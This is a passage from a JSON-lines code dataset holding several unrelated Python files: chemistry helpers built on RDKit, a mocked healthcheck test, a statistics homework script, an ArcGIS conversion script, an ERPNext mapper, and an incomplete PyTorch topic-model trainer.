rdkit.Chem.rdForceFieldHelpers import MMFFOptimizeMolecule, UFFOptimizeMolecule\n\n\n@for_all_methods(timer_logger)\nclass RDKit:\n \"\"\"Class for controlling useful RDKit functions; try to keep class static.\"\"\"\n\n def __init__(self):\n pass\n\n def read_file(self, filename):\n\n # This handles splitting the paths\n filename = Path(filename)\n\n # Try and read the file\n if filename.suffix == '.pdb':\n mol = MolFromPDBFile(filename.name, removeHs=False)\n try:\n rdPartialCharges.ComputeGasteigerCharges(mol)\n except RuntimeError:\n print('RDKit could not assign the partial charges')\n elif filename.suffix == '.mol2':\n mol = MolFromMol2File(filename.name, removeHs=False)\n elif filename.suffix == '.mol':\n mol = MolFromMolFile(filename.name, removeHs=False)\n else:\n mol = None\n\n return mol\n\n def smiles_to_pdb(self, smiles_string, name=None):\n \"\"\"\n Converts smiles strings to RDKit molobject.\n :param smiles_string: The hydrogen free smiles string\n :param name: The name of the molecule this will be used when writing the pdb file\n :return: The RDKit molecule\n \"\"\"\n # Originally written by venkatakrishnan; rewritten and extended by Chris Ringrose\n\n if 'H' in smiles_string:\n raise SyntaxError('Smiles string contains hydrogen atoms; try again.')\n\n m = AllChem.MolFromSmiles(smiles_string)\n if name is None:\n name = input('Please enter a name for the molecule:\\n>')\n m.SetProp('_Name', name)\n mol_hydrogens = AllChem.AddHs(m)\n AllChem.EmbedMolecule(mol_hydrogens, AllChem.ETKDG())\n AllChem.SanitizeMol(mol_hydrogens)\n\n print(AllChem.MolToMolBlock(mol_hydrogens), file=open(f'{name}.mol', 'w+'))\n AllChem.MolToPDBFile(mol_hydrogens, f'{name}.pdb')\n\n return f'{name}.pdb'\n\n def mm_optimise(self, filename, ff='MMF'):\n \"\"\"\n Perform rough 
preliminary optimisation to speed up later optimisations.\n :param filename: The name of the input file\n :param ff: The force field to be used, either 'MMF' or 'UFF'\n :return: The name of the optimised pdb file that is made\n \"\"\"\n\n # Get the rdkit molecule\n mol = RDKit().read_file(filename)\n\n force_fields = {'MMF': MMFFOptimizeMolecule, 'UFF': UFFOptimizeMolecule}\n\n force_fields[ff](mol)\n\n AllChem.MolToPDBFile(mol, f'{filename.stem}_rdkit_optimised.pdb')\n\n return f'{filename.stem}_rdkit_optimised.pdb'\n\n def rdkit_descriptors(self, filename):\n \"\"\"\n Use RDKit Descriptors to extract properties and store in Descriptors dictionary.\n :param filename: The molecule input file\n :return: Descriptors dictionary\n \"\"\"\n\n mol = RDKit().read_file(filename)\n # Use RDKit Descriptors to extract properties and store in Descriptors dictionary\n descriptors = {'Heavy atoms': Descriptors.HeavyAtomCount(mol),\n 'H-bond donors': Descriptors.NumHDonors(mol),\n 'H-bond acceptors': Descriptors.NumHAcceptors(mol),\n 'Molecular weight': Descriptors.MolWt(mol),\n 'LogP': Descriptors.MolLogP(mol)}\n\n return descriptors\n\n def get_smiles(self, filename):\n \"\"\"\n Use RDKit to load in the pdb file of the molecule and get the smiles code.\n :param filename: The molecule input file\n :return: The smiles string\n \"\"\"\n\n mol = RDKit().read_file(filename)\n\n return MolToSmiles(mol, isomericSmiles=True, allHsExplicit=True)\n\n def get_smarts(self, filename):\n \"\"\"\n Use RDKit to get the smarts string of the molecule.\n :param filename: The molecule input file\n :return: The smarts string\n \"\"\"\n\n mol = RDKit().read_file(filename)\n\n return MolToSmarts(mol)\n\n def get_mol(self, filename):\n \"\"\"\n Use RDKit to generate a mol file.\n :param filename: The molecule input file\n :return: The name of the mol file made\n \"\"\"\n\n mol = RDKit().read_file(filename)\n\n mol_name = f'{filename.stem}.mol'\n MolToMolFile(mol, mol_name)\n\n return mol_name\n\n def generate_conformers(self, filename, conformer_no=10):\n \"\"\"\n Generate a set of conformers of the molecule\n :param conformer_no: The number of conformers to make for the molecule\n :param filename: The name of the input file\n :return: A list of conformer position arrays\n \"\"\"\n\n mol = RDKit().read_file(filename)\n\n # EmbedMultipleConfs returns conformer ids; the conformers themselves are stored on the molecule\n AllChem.EmbedMultipleConfs(mol, numConfs=conformer_no)\n positions = mol.GetConformers()\n coords = [conformer.GetPositions() for conformer in positions]\n\n return coords\n","sub_path":"QUBEKit/engines/rdkit.py","file_name":"rdkit.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"125482216","text":"from lambda_functions.v1.functions.healthcheck import healthcheck\nimport pytest\nimport requests\n\nfrom lambda_functions.v1.tests.helpers.use_test_data import is_valid_schema\n\n\n@pytest.fixture(autouse=True)\ndef mock_env_setup(monkeypatch):\n monkeypatch.setenv(\"SIRIUS_BASE_URL\", \"http://localhost:8080\")\n monkeypatch.setenv(\"LOGGER_LEVEL\", \"DEBUG\")\n\n\n@pytest.fixture\ndef mock_service_status(monkeypatch):\n class MockResponse(object):\n def __init__(self):\n self.status_code = 200\n self.url = \"http://fake_sirius/api/health-check/service-status\"\n self.headers = {\"myheader\": \"this is some header information\"}\n self.text = {\n \"ok\": \"true\",\n \"membrane\": {\"ok\": \"true\", \"status-code\": 200},\n \"api\": {\"ok\": \"true\", \"status-code\": 200},\n \"ddc-queue\": {\n \"ok\": 
\"true\",\n \"queue-type\": \"sqs\",\n \"attributes\": {\n \"VisibilityTimeout\": \"30\",\n \"DelaySeconds\": \"0\",\n \"ReceiveMessageWaitTimeSeconds\": \"0\",\n \"ApproximateNumberOfMessages\": \"0\",\n \"ApproximateNumberOfMessagesNotVisible\": \"0\",\n \"ApproximateNumberOfMessagesDelayed\": \"0\",\n \"CreatedTimestamp\": \"1581527140\",\n \"LastModifiedTimestamp\": \"1581527140\",\n \"QueueArn\": \"arn:aws:sqs:eu-west-1:000000000000:ddc.fifo\",\n \"ContentBasedDeduplication\": \"true\",\n \"FifoQueue\": \"true\",\n },\n },\n }\n\n def mock_get(url, **kwargs):\n return MockResponse()\n\n monkeypatch.setattr(requests, \"get\", mock_get)\n\n\ndef test_get_response_success(mock_service_status):\n\n response = healthcheck.lambda_handler(event=None, context=None)\n is_valid_schema(response, \"standard_lambda_response_schema.json\")\n assert response[\"statusCode\"] == 200\n assert len(response[\"body\"]) == 4\n","sub_path":"lambda_functions/v1/tests/healthcheck/test_healthcheck.py","file_name":"test_healthcheck.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"265231136","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.stats as stats\nfrom scipy import signal\n\n#verifying the result obtained with numerical value\nc=2 \n\n#generating two uniform distributions \ny_1 = stats.uniform(loc=-c/4, scale=c/2)\ny_2 = stats.uniform(loc=(2/c)+(c/4), scale=c/2)\n\ndx = 0.0001\nx = np.arange(-4,4,dx)\n\npmf1 = y_1.pdf(x)*dx\npmf2 = y_2.pdf(x)*dx\nconv_pmf = signal.fftconvolve(pmf1,pmf2,'same')\n\npdf1 = pmf1/dx\npdf2 = pmf2/dx\nconv_pdf = conv_pmf/dx\n\n\nprint(\"Area under pdf of Y_1: \" +str(np.trapz(pdf1,x)))\nprint(\"Area under pdf of Y_2: \" +str(np.trapz(pdf2,x)))\nprint(\"Area under convoluted pdf: \" +str(np.trapz(conv_pdf,x)))\n\n# Region 1 of PDF\nx_1 = np.arange(-4, 1, 0.1)\ny_1 = x_1*0\n# Region 2 of PDF\nx_2 = np.arange(1, 2, 0.1)\ny_2= x_2 - 1\n# Region 3 of PDF\nx_3 = np.arange(2, 3, 0.1)\ny_3= 3-x_3\n# Region 4 of PDF\nx_4 = np.arange(3, 4, 0.1)\ny_4= x_4*0\n\n\n# Plotting the points\n\n\n#plotting pdfs of uniform distributions and convoluted function\nplt.plot(x_1, y_1,'b',marker='o',label='X-Theory')\nplt.plot(x_2, y_2,'b',marker='o')\nplt.plot(x_3, y_3,'b',marker='o')\nplt.plot(x_4, y_4,'b',marker='o')\nplt.plot(x,pdf1, label='$Y_2$')\nplt.plot(x,pdf2, label='$Y_1$')\nplt.plot(x,conv_pdf,'r',label='X-Simulation')\nplt.legend(loc='best')\nplt.suptitle('PDFs')\nplt.grid()\nplt.show()\n\n# Normalize the data to a proper PDF\nZ=conv_pdf/ (dx * conv_pdf).sum()\n\n# Compute the CDF\ncdf = np.cumsum(Z * dx)\n\n#Region 1 of CDF\nx_1 = np.arange(-4, 1, 0.1)\ny_1 = x_1*0\n# Region 2 of CDF\nx_2 = np.arange(1, 2, 0.1)\ny_2= (x_2**2-2*x_2+1)/2\n# Region 3 of CDF\nx_3 = np.arange(2, 3, 0.1)\ny_3= (6*x_3-x_3**2-7)/2\n# Region 4 of CDF\nx_4 = np.arange(3, 4, 0.1)\ny_4= x_4**0\n\nplt.plot(x_1, y_1,'b',marker='o',label='Theory')\nplt.plot(x_2, y_2,'b',marker='o')\nplt.plot(x_3, y_3,'b',marker='o')\nplt.plot(x_4, y_4,'b',marker='o')\nplt.plot(x,cdf,'r',label='Simulation')\nplt.xlabel('Random Variable , X')\nplt.ylabel('$F_{X}(x)$')\nplt.suptitle('CDF of X')\nplt.legend(loc='best')\nplt.grid()\nplt.show()","sub_path":"Assignment_2_AI1103.py","file_name":"Assignment_2_AI1103.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"192522867","text":"true = \"true\"\r\ncnt1 = 0\r\ncnt2 = 
0\r\nlove = \"love\"\r\n\r\nprint(\"Welcome to the Love Calculator!\")\r\nname1 = input(\"What is your name? \\n\")\r\nname2 = input(\"What is their name? \\n\")\r\n\r\nfor i in range(0, len(true)):\r\n cnt1 += name1.count(true[i])\r\n cnt1 += name2.count(true[i])\r\n\r\nfor i in range(0, len(love)):\r\n cnt2 += name1.count(love[i])\r\n cnt2 += name2.count(love[i])\r\n\r\nloveScore = str(cnt1) + str(cnt2)\r\nloveScore = int(loveScore)\r\nif (loveScore < 10) or (loveScore > 90):\r\n print(f\"Your score is {loveScore}, you go together like coke and mentos.\")\r\nelif (loveScore >= 40) and (loveScore <= 50):\r\n print(f\"Your score is {loveScore}, you are alright together.\")\r\nelse:\r\n print(f\"Your score is {loveScore}\")\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"552332081","text":"# AMP Automation Import Tool\r\n# 6-16-2017\r\n# Created by: Nirav Ilango\r\n# Contact: nilango@usaid.gov or niravilango@gmail.com\r\n# This script automates the conversion of a csv to a shapefile, then converts it into a service to go into the ArcGIS server.\r\n\r\n\r\n# everything has been included to this point other than the server upload\r\nimport arcpy\r\nimport random\r\nimport os\r\n\r\nfile1 = open(r\"P:\\Public\\PublicGIS\\Scripts\\test1.txt\", \"w\") #this is your test file to write to\r\nfile = arcpy.GetParameterAsText(0) #gets file\r\ndata = r\"P:\\Public\\PublicGIS\\Scripts\" #working folder\r\nrandomnum = random.randrange(10000)\r\nstrrandom = str(randomnum)\r\nname = \"D\" + strrandom + \".dbf\" #creates random name for dbf so that same dbf doesn't save\r\npath = os.path.join(data, name)\r\narcpy.ExcelToTable_conversion(file, path) #converts to dbf\r\narcpy.AddField_management(path, \"Lat1\", \"FLOAT\") #adds float field to replace string field\r\narcpy.AddField_management(path, \"Log1\", \"FLOAT\") #adds float field to replace string field\r\nexpression1 = \"func(!Latitude!)\" #for calculate field\r\nexpression2 = \"func(!Longitude!)\"\r\ncodeblock1 = \"\"\"def func(lat):\r\n\ttry:\r\n\t\tval = int(lat)\r\n\texcept ValueError:\r\n\t\tval = 0\r\n\treturn val\r\n\"\"\" #this deals with the gaps in the data, which stops the calculate field\r\ncodeblock2 = \"\"\"def func(log):\r\n\ttry:\r\n\t\tval = int(log)\r\n\texcept ValueError:\r\n\t\tval = 0\r\n\treturn val\r\n\"\"\"\r\narcpy.CalculateField_management(path, \"Lat1\", expression1, \"PYTHON\", codeblock1) #creates float fields to make xy layer\r\narcpy.CalculateField_management(path, \"Log1\", expression2, \"PYTHON\", codeblock2) #creates float fields to make xy layer\r\narcpy.MakeXYEventLayer_management(path, \"Log1\", \"Lat1\", \"AMP\" ,4326, \"\") #creates temp XY layer\r\ndata = r\"P:\\Public\\PublicGIS\\Scripts\"\r\nrandomnum = random.randrange(10000)\r\nstrrandom = str(randomnum)\r\nfname = \"AMP\" + strrandom + \".shp\"\r\nfc = os.path.join(data, fname)\r\narcpy.CopyFeatures_management(\"AMP\", fc) #saves the AMP layer permanently\r\ncursor = arcpy.UpdateCursor(fc)\r\nfield1 = \"Lat1\"\r\nfor row in cursor: #deletes missing data, which is where X,Y = 0\r\n\t\tif row.getValue(field1) == 0:\r\n\t\t\tcursor.deleteRow(row)\r\n\r\n#uploading a 
service\r\n#http://resources.arcgis.com/EN/HELP/MAIN/10.2/index.html#//00sq000000nw000000","sub_path":"amp.py","file_name":"amp.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"395222304","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors\n# License: GNU General Public License v3. See license.txt\n\nfrom __future__ import unicode_literals\nimport frappe, json\nfrom frappe.utils import cstr, cint, get_fullname\nfrom frappe import msgprint, _\nfrom frappe.model.mapper import get_mapped_doc\nfrom erpnext.setup.utils import get_exchange_rate\nfrom erpnext.utilities.transaction_base import TransactionBase\nfrom erpnext.accounts.party import get_party_account_currency\n\nsubject_field = \"title\"\nsender_field = \"contact_email\"\n\n# 2017-01-08 - RM\n# Creates a request for quotation from an opportunity\n# 2017-02-17 - JDLP\n# Transfer the code from Erpnext to Radplusplus\n@frappe.whitelist()\ndef make_request_for_quotation(source_name, target_doc=None):\n\tdoclist = get_mapped_doc(\"Opportunity\", source_name, {\n\t\t\"Opportunity\": {\n\t\t\t\"doctype\": \"Request for Quotation\",\n\t\t\t\"field_map\": {\n\t\t\t\t\"name\": \"opportunity\",\n\t\t\t}\n\t\t},\n\t\t\"Opportunity Item\": {\n\t\t\t\"doctype\": \"Request for Quotation Item\",\n\t\t\t\"field_map\": {\n\t\t\t\t\"uom\": \"stock_uom\"\n\t\t\t}\n\t\t}\n\t}, target_doc)\n\n\treturn doclist\n","sub_path":"radplusplus/crm/doctype/opportunity/opportunity.py","file_name":"opportunity.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"542733066","text":"# -*- coding: utf-8 -*-\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nimport numpy as np\nfrom tqdm import tqdm, trange\n\nfrom layers.seqlayer import sLSTM, mLinear, dLSTM\nfrom layers.vrnnlayer import vrnn\n\nfrom utils import TensorboardWriter\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import FuncFormatter, MaxNLocator\nfrom colorama import Fore\nfrom colorama import Style\nimport os\nfrom datetime import datetime\n# from __init__ import LOGGER\nimport shutil\nimport pickle\n# import scipy.optimize\n\nclass Solver(object):\n    def __init__(self, config=None, train_loader=None, test_loader=None, valid_loader=None):\n        \"\"\"Class that Builds, Trains and Evaluates SUM-GAN model\"\"\"\n        self.config = config\n        self.train_loader = train_loader\n        os.environ[\"CUDA_VISIBLE_DEVICES\"] = self.config.gpu\n        f_vocab = './output/vocab.dat'\n        self.rev_vocab = dict()\n        with open(f_vocab, 'r') as f:\n            for line in f:\n                wi = line.split('\\t')\n                self.rev_vocab[int(wi[1])] = wi[0]\n\n    def build(self):\n        # Build Modules\n        self.embedding = nn.Embedding(self.config.vocab_size+1, self.config.input_size, padding_idx=0)\n        self.topicemb = Variable(torch.FloatTensor(self.config.topic_size, self.config.input_size), requires_grad=True)\n\n        if False:\n            weights_matrix = pickle.load(open('./output/glove_weight_50d.dat','rb'), encoding='latin1')\n            self.embedding.weight.data = torch.Tensor(weights_matrix)\n            self.embedding.weight.requires_grad = False\n\n        self.rnn_w = sLSTM(self.config.input_size, self.config.hidden_size, num_layers=1)\n        self.dLSTM = dLSTM(self.config.input_size*2, self.config.d_hidden_size,\n                           self.config.topic_size, self.config.MAX_WORD, 
self.config.batch_size, self.config.vocab_size, self.rev_vocab)\n\n self.prob_q = nn.Sequential(\n nn.Linear(self.config.hidden_size, self.config.hidden_size),\n nn.ReLU(),\n nn.Linear(self.config.hidden_size, self.config.hidden_size),\n nn.ReLU(),\n # nn.Linear(self.config.hidden_size, self.config.hidden_size),\n # nn.ReLU()\n )\n self.Q_mu = nn.Linear(self.config.hidden_size, self.config.topic_size)\n self.Q_var = nn.Sequential(\n nn.Linear(self.config.hidden_size, self.config.topic_size),\n nn.Softplus()\n )\n\n self.prob_p = nn.Sequential(\n nn.Linear(self.config.hidden_size, self.config.hidden_size),\n nn.ReLU(),\n nn.Linear(self.config.hidden_size, self.config.hidden_size),\n nn.ReLU(),\n # nn.Linear(self.config.hidden_size, self.config.hidden_size),\n # nn.ReLU()\n )\n self.P_mu = nn.Linear(self.config.hidden_size, self.config.topic_size)\n self.P_var = nn.Sequential(\n nn.Linear(self.config.hidden_size, self.config.topic_size),\n nn.Softplus()\n )\n\n # self.vrnn = vrnn(self.config.hidden_word_size+self.config.topic_size,self.config.hidden_size)\n # self.vrnn = vrnn(self.config.hidden_size + self.config.topic_size, self.config.hidden_size, self.config.topic_size)\n self.vrnn = vrnn(self.config.hidden_size, self.config.hidden_size,\n self.config.topic_size)\n # self.vrnn = vrnn(self.config.topic_size, self.config.hidden_size,\n # self.config.topic_size)\n\n self.model = nn.ModuleList([\n self.rnn_w, self.vrnn, self.prob_q, self.prob_p,\n self.Q_mu, self.Q_var, self.P_mu, self.P_var, self.dLSTM\n ])\n\n # Init for LDA\n self.wordTopicCounts = np.zeros([self.config.vocab_size, self.config.topic_size])\n self.topicCounts = np.zeros(self.config.topic_size)\n self.backgroundWords = np.zeros(self.config.vocab_size)\n self.topicWords = np.zeros([self.config.vocab_size, self.config.topic_size])\n self.kappa = 0.01 #np.random.rand()\n self.wordTopics = dict()\n\n # self.stopword = pickle.load(open('./output/stopword_index.dat', 'rb'))\n self.stopword = []\n self.stopword.append(0)\n\n # self._lambda = 1.0\n\n if self.config.mode == 'train':\n\n # Overview Parameters\n print('Init Model Parameters')\n torch.nn.init.xavier_uniform_(self.topicemb.data)\n # torch.nn.init.xavier_uniform_(self.embedding.weight.data[1:])\n for name, param in self.model.named_parameters():\n print('\\t' + name + '\\t', list(param.size()))\n if 'weight' in name and 'bnorm' not in name:\n torch.nn.init.xavier_normal_(param)\n if 'bias' in name:\n torch.nn.init.constant_(param, 0.)\n\n # Tensorboard\n # if self.config.write_model:\n current_time = datetime.now().strftime('%b%d_%H-%M-%S')\n self.writer = TensorboardWriter(self.config.logdir + '/' + current_time)\n # Add emb-layer\n self.model.train()\n\n self.model.append(self.embedding)\n # self.embedding.weight[0] = self.embedding.weight[0]*0.\n # Build Optimizers\n self.optimizer = optim.Adam(\n list(self.model.parameters()) + [self.topicemb],\n lr=self.config.lr\n )\n print(self.model)\n\n def load_model(self):\n _fname = './{}/chk_point_{}.pth'.format(self.config.modeldir, self.config.resume_ep)\n if os.path.isfile(_fname):\n print(\"=> loading checkpoint '{}'\".format(_fname))\n if int(self.config.gpu) < 0:\n checkpoint = torch.load(_fname, map_location=lambda storage, loc: storage) # load into cpu-mode\n else:\n checkpoint = torch.load(_fname) # gpu-mode\n self.start_epoch = checkpoint['epoch']\n # checkpoint['state_dict'].pop('1.s_lstm.out.0.bias',None) # remove bias in selector\n self.model.load_state_dict(checkpoint['state_dict'])\n 
self.optimizer.load_state_dict(checkpoint['optimizer'][0])\n self.topicemb = checkpoint['topic_emb']\n else:\n print(\"=> no checkpoint found at '{}'\".format(_fname))\n\n def reconstruction_loss(self, h_origin, h_fake):\n \"\"\"L2 loss between original-regenerated features at cLSTM's last hidden layer\"\"\"\n return torch.mean(torch.pow(h_origin - h_fake, 2))\n\n def prior_loss(self, mu, log_variance):\n \"\"\"KL( q(e|x) || N(0,1) )\"\"\"\n kl = -1 + log_variance.exp() + mu.pow(2) - log_variance\n kl_t = torch.transpose(kl,0,1).contiguous().view(mu.shape[1], -1)\n\n return 0.5 * torch.mean(torch.sum(kl_t,-1))\n\n def entropy_loss(self, P, Q): # increasing entropy for scores\n en_p = torch.sum(P * torch.log(P), dim=-1)\n en_q = torch.sum(Q * torch.log(Q), dim=-1)\n return -(torch.mean(en_p) + torch.mean(en_q))\n\n def entropy_topic(self):\n _e = Variable(torch.eye(self.config.topic_size), requires_grad=False)\n beta = self.beta(_e)\n kl_list = []\n for i in range(self.config.topic_size):\n for j in range(i+1, self.config.topic_size):\n Q = beta[i]\n P = beta[j]\n kl_list.append(torch.sigmoid(-torch.sum(Q * torch.log(Q / P),dim=-1)))\n return sum(kl_list)/(self.config.topic_size*(self.config.topic_size-1)/2)\n\n\n def _zero_grads(self):\n self.optimizer.zero_grad()\n\n def save_checkpoint(self, state, filename):\n torch.save(state, filename)\n\n def update_param(self, module):\n for name, param in module.named_parameters():\n temp = torch.exp(param.data)\n param.data = torch.log(temp / torch.sum(temp,0).view(1,-1))\n\n def KLDist2DistBuck(self, Q, P):\n kl = torch.mean(torch.sum(Q * torch.log(Q / P), dim=-1))\n # kl = torch.sum(torch.sum(Q * torch.log(Q / P), dim=-1))\n # kl = T.mean(T.sum(T.switch(T.neq(Q,0) & T.neq(P,0),Q * T.log(Q/P),0), axis=1))\n return kl\n\n def logLK(self, var_x, Q, stop_tensor):\n Q_one = Variable(torch.ones(Q.shape[0], Q.shape[1], 1), requires_grad=False)\n prob_x = (1.-self.config.eps_reg)*self.beta(Q) + self.config.eps_reg*self.bg_distr(Q_one)\n log_prob_x = torch.log(prob_x)\n mask_log = Variable(torch.zeros(log_prob_x.shape), requires_grad=False)\n var_x_ = torch.unsqueeze(var_x,1)\n mask_log = mask_log.scatter_(-1,var_x_,1)\n\n mask_log = mask_log.scatter_(-1, stop_tensor.repeat(mask_log.shape[0],mask_log.shape[1],1), 0) # remove stop-words\n log_prob_x_ = (log_prob_x * mask_log)[:,:,1:] # remove pad-word\n llk = torch.sum(log_prob_x_,-1)\n return torch.mean(llk) # for len of doc = num of sentences\n\n # Apply L-BFGS algorithm\n def fn(self, X):\n # res = 0\n # dtopicWords = np.zeros_like(self.topicWords)\n X = np.reshape(X,self.topicWords.shape)\n bg_topicword = np.expand_dims(self.backgroundWords,1) + X\n Z = np.sum(np.exp(bg_topicword),axis=0)\n lZ = np.log(Z)\n res = -np.sum((bg_topicword - lZ) * self.wordTopicCounts)\n\n # dtopicWord\n dtopicWords = -(self.wordTopicCounts - self.topicCounts/Z * np.exp(bg_topicword))\n\n return res, dtopicWords.flatten()\n\n def sumZ(self):\n bg_topicword = np.expand_dims(self.backgroundWords, 1) + self.topicWords\n Z = np.sum(np.exp(bg_topicword), axis=0)\n return Z\n\n def normalizeTopicWords(self):\n av_topic = np.mean(self.topicWords, axis=1)\n self.topicWords -= np.expand_dims(av_topic,1)\n self.backgroundWords = av_topic\n\n def get_norm_grad(self, module, norm_type=2):\n total_norm = 0\n for name, param in module.named_parameters():\n if param.grad is not None:\n total_norm += torch.sum(torch.pow(param.grad.view(-1),2))\n return torch.sqrt(total_norm)\n\n\n def clear_grad_pad(self):\n grad = 
self.embedding.weight.grad\n grad[0] = torch.zeros_like(grad[0])\n\n def initFunc(self):\n for batch_i, doc_features in enumerate(tqdm(\n self.train_loader, desc='Batch', ncols=80, leave=False)):\n _xb, _yb, corpus_idb = doc_features\n for b in range(self.config.batch_size):\n _x, _y, corpus_id = _xb[b,:,:], _yb[b,:], corpus_idb[b]\n cor_x = _x.squeeze_(0).numpy()\n corpus_id = np.asscalar(corpus_id.numpy())\n if corpus_id not in self.wordTopics:\n self.wordTopics[corpus_id] = dict()\n for doc_id, doc_x in enumerate(cor_x):\n self.wordTopics[corpus_id][doc_id] = dict()\n doc_x_clean = [w for w in doc_x if w not in self.stopword]\n temp = np.random.choice(range(self.config.topic_size), len(doc_x_clean))\n self.wordTopics[corpus_id][doc_id] = temp\n for wp, wi_0 in enumerate(doc_x_clean):\n wi = wi_0 - 1\n self.wordTopicCounts[wi, temp[wp]] += 1\n self.topicCounts[temp[wp]] += 1\n\n\n def train_rnn(self, maxiter=1):\n kl_list = []\n nllk_list = []\n total_loss_value = []\n sp_list = []\n for batch_i, doc_features in enumerate(tqdm(\n self.train_loader, desc='Batch-RNN', ncols=80, leave=False)):\n\n self._zero_grads()\n\n _x, _y, corpus_id = doc_features\n corpus_id = corpus_id.numpy()\n var_x_ = Variable(_x, requires_grad=False)\n var_y = Variable(_y, requires_grad=False)\n # [b_len x s_len x w_len]\n var_x = torch.squeeze(var_x_, 0)\n # emb_x = self.embedding(var_x).reshape(-1, var_x.shape[-1], self.config.input_size).transpose(0, 1)\n # sen_x = self.rnn_w(emb_x).reshape(var_x.shape[0], var_x.shape[1], -1).transpose(0,1)\n emb_x = self.embedding(var_x)\n sen_x = torch.sum(emb_x, 2).transpose(0, 1)\n # sen_x = torch.unsqueeze(sen_x_, 1)\n # [len x batch x wdim]\n zQ, kl_seq = self.vrnn(self.prob_q, self.prob_p,\n sen_x, self.config,\n self.Q_mu, self.Q_var, self.P_mu, self.P_var, self.topicemb)\n inv_var_x = Variable(torch.LongTensor(np.asarray(var_x.numpy()[:,:,::-1],dtype=float).transpose(1,0,-1)), requires_grad=False)\n\n Q = nn.Softmax(dim=-1)(zQ)\n sloss_lst = []\n for s in range(zQ.shape[0]):\n sprob = self.dLSTM(self.topicemb, self.embedding, Q[s], inv_var_x[s])\n sloss = torch.mean(torch.sum(sprob,-1))\n sloss_lst.append(sloss)\n\n # Sampling Z\n # Q = nn.Softmax(dim=-1)(zQ * self.kappa)\n # np_Q = zQ.data.numpy()\n # np_Q = np.squeeze(np_Q, 1)\n # topicCorpus = []\n # for b in range(Q.shape[1]):\n # cor_x = _x[b].numpy()\n # mask = np.zeros([cor_x.shape[0],self.config.topic_size])\n # for doc_id, doc_x in enumerate(cor_x):\n # topics = self.wordTopics[np.asscalar(corpus_id[b])][doc_id]\n # if len(topics)>0:\n # countTopic = np.zeros(self.config.topic_size)\n # # for wp, wi in enumerate(doc_x[doc_x!=0]):\n # doc_x_clean = [w for w in doc_x if w not in self.stopword]\n # for wp, _ in enumerate(doc_x_clean):\n # countTopic[topics[wp]] += 1\n #\n # # concat all topics-count\n # # countTopicList.append(countTopic)\n # mask[doc_id] = countTopic\n #\n # countTopicList = np.expand_dims(mask, 1)\n # topicCorpus.append(countTopicList)\n #\n # topicCorpus = Variable(torch.FloatTensor(np.concatenate(topicCorpus,1)),\n # requires_grad=False)\n pQ = torch.log(Q)\n llk = sum(sloss_lst)\n kl_loss = torch.mean(torch.sum(kl_seq,0))\n sp = torch.mean(torch.sum(torch.sum(pQ,-1),0))*0.\n\n batch_loss = -llk + kl_loss -sp\n\n batch_loss.backward(retain_graph=True)\n # self.clear_grad_pad()\n# torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.config.clip)\n# torch.nn.utils.clip_grad_norm_(self.topicemb.data, self.config.clip)\n self.optimizer.step()\n\n # 
print(torch.sqrt(torch.sum(torch.pow(self.topicemb.grad.view(-1),2))))\n\n total_loss_value.append(batch_loss.data.numpy())\n nllk_list.append(-llk.data.numpy())\n kl_list.append(kl_loss.data.numpy())\n sp_list.append(-sp.data.numpy())\n\n argmax = torch.argmax(Q[:,-1,:], -1)\n print('\\n-Doc: {}'.format(corpus_id[-1]))\n print(argmax.data.numpy().flatten())\n\n return total_loss_value, nllk_list, kl_list, sp_list\n\n def sample_Z(self, sample=False):\n # sZ = self.sumZ()\n for batch_i, doc_features in enumerate(tqdm(\n self.train_loader, desc='Batch-TM', ncols=80, leave=False)):\n\n _x, _y, corpus_idb = doc_features\n corpus_idb = corpus_idb.numpy()\n var_x_ = Variable(_x, requires_grad=False)\n var_y = Variable(_y, requires_grad=False)\n # [s_len x w_len]\n var_x = torch.squeeze(var_x_, 0)\n emb_x = self.embedding(var_x).reshape(-1,var_x.shape[-1], self.config.input_size).transpose_(0, 1)\n sen_x = self.rnn_w(emb_x).reshape(var_x.shape[1], var_x.shape[0],-1)\n # sen_x = torch.unsqueeze(sen_x_, 1)\n # [len x batch x nTopic]\n zQ, _ = self.vrnn(self.prob_q, self.prob_p, sen_x, self.config,\n self.Q_mu, self.Q_var, self.P_mu, self.P_var)\n\n # calculate all losses\n # kl_loss = self.config.kl_reg*self.KLDist2DistBuck(Q,P)\n\n # kl_loss = torch.sum(kl_seq)\n # kl_list.append(kl_loss.data.numpy())\n\n # llk = self.logLK(var_x,Q,stop_tensor)\n # entro_loss = self.config.entropy_reg*self.entropy_loss(P,Q)\n # entro_topic = self.entropy_topic()\n\n # Sampling Z\n # Q = nn.Softmax(dim=-1)(zQ*self.kappa)\n np_Q = zQ.data.numpy()\n # np_Q = np.squeeze(np_Q, 1)\n cor_x = _x.squeeze_(0).numpy()\n\n for b in range(cor_x.shape[0]):\n corpus_id = np.asscalar(corpus_idb[b])\n if corpus_id==217:\n print('..')\n for doc_id, doc_x in enumerate(cor_x[b]):\n topics = self.wordTopics[corpus_id][doc_id]\n if len(topics) >0:\n countTopic = np.zeros(self.config.topic_size)\n # for wp, wi in enumerate(doc_x[doc_x!=0]):\n doc_x_clean = [w for w in doc_x if w not in self.stopword]\n for wp, wi_0 in enumerate(doc_x_clean):\n wi = wi_0 - 1\n topicScores = np.zeros(self.config.topic_size)\n\n for k in range(self.config.topic_size):\n # topicScores[k] = np.exp(self.kappa * np_Q[doc_id, k]\n # + 